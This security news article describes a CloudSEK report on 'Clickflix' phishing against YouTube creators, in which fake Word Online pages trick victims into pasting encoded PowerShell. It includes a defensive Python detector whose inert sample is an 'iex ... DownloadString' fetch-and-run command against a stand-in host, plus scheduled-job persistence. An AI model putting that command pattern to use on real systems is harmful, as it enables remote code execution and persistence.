
A new report from CloudSEK highlights a sophisticated malware campaign targeting YouTube content creators through spearphishing tactics. The attackers are leveraging trusted brand names and offers of professional collaborations to deliver malicious payloads, employing a novel “Clickflix” technique to enhance their deception.
The report reveals that threat actors are sending phishing emails disguised as promotional materials, contracts, or business proposals to YouTube creators. These emails contain malicious attachments, such as Word documents, PDFs, or Excel files, which serve as the initial infection vector. According to the report, “The email subject lines and content are meticulously designed to mimic legitimate business opportunities, such as promotions, partnership proposals, and marketing collaborations”.
The attack hinges on social engineering, tricking victims into copying and pasting PowerShell scripts that execute malware on their systems. Once activated, this malware can steal browser data, including login credentials, cookies, and digital wallets, or grant remote access to the attackers. The report emphasizes that “This campaign specifically exploits YouTube creators’ interest in brand deals and partnerships to increase its effectiveness”.
CloudSEK’s Threat Research team uncovered a specific instance of this campaign where threat actors impersonated the popular video creation platform, Pictory, and their professional collaboration offers. The attackers sent emails with subject lines like “Re: Terms explanation,” proposing brand collaborations and attaching what appeared to be payment forms.
The report details the “Clickflix” technique: after the victim clicks a link in the email, they are directed to a Google document, which in turn prompts them to open a “Wire-transfer form” as a Word file. The threat actor created a fake Microsoft webpage that closely resembles Microsoft Word Online. This page displays an error message stating that the “Word Online” extension is not installed and offers two buttons, “How to fix” and “Auto-fix”.

Clicking the “How to fix” button copies a base64-encoded PowerShell command to the computer’s clipboard. The page then instructs the target to open a PowerShell terminal and right-click the console window, which pastes and executes the malicious PowerShell script. The report notes that “Right-clicking a terminal window pasted the content of the clipboard and executed the PowerShell“.
The executed PowerShell script is heavily obfuscated and designed to manipulate browser behavior. It ultimately downloads a malicious payload, establishes persistence through a scheduled job, and communicates with command and control (C2) servers to exfiltrate stolen data.
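As an added defensive illustration (this is not code from the CloudSEK report), the following Python decodes a base64 `-EncodedCommand` PowerShell command line of the kind the campaign places on the clipboard and flags the download, execution, persistence and hidden-window patterns an analyst would want to review in process-creation telemetry. The indicator list, the `analyse` function and the inert sample command line are constructed assumptions, not indicators published by the report.

```python
import base64
import re
from typing import Optional

# Assumed indicator patterns. The report describes payload download, scheduled-job
# persistence and C2 traffic; these cmdlets are common ways to do that, nothing more.
SUSPICIOUS_PATTERNS = {
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "execution": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "persistence": re.compile(r"Register-ScheduledJob|schtasks", re.I),
    "stealth": re.compile(r"-(w|win|windowstyle)\s+hidden", re.I),
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind an -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # malformed base64 or odd byte count
        return None


def analyse(cmdline: str) -> dict:
    """Decode a command line and report which indicator groups it matches."""
    script = decode_encoded_command(cmdline)
    text = cmdline + " " + (script or "")  # flags may sit on the outer command line
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    return {"encoded": script is not None, "script": script,
            "indicators": hits, "verdict": "review" if hits else "ok"}


def encode_powershell(script: str) -> str:
    """Encode as PowerShell does (UTF-16LE, base64); used only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed, inert sample with the shape the article describes (hidden window,
# encoded command, download, in-memory execution, scheduled-job persistence).
SAMPLE_SCRIPT = ("iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p'); "
                 "Register-ScheduledJob -Name upd -ScriptBlock {}")
SAMPLE_CMDLINE = "powershell.exe -w hidden -enc " + encode_powershell(SAMPLE_SCRIPT)
BENIGN_CMDLINE = "powershell.exe -NoProfile -Command Get-Date"

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(analyse(line))
```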
While the report acknowledges that targeting YouTube creators is not a new tactic, it highlights that “the use of the Clickflix technique represents a new advancement that requires further investigation”. This campaign demonstrates the evolving sophistication of cyberattacks and the importance of vigilance for online content creators.
To protect themselves, YouTube creators should be wary of unsolicited emails offering brand deals or collaborations, especially those containing attachments or links. It is crucial to verify the legitimacy of such offers through official channels and to avoid copying and pasting commands from untrusted sources.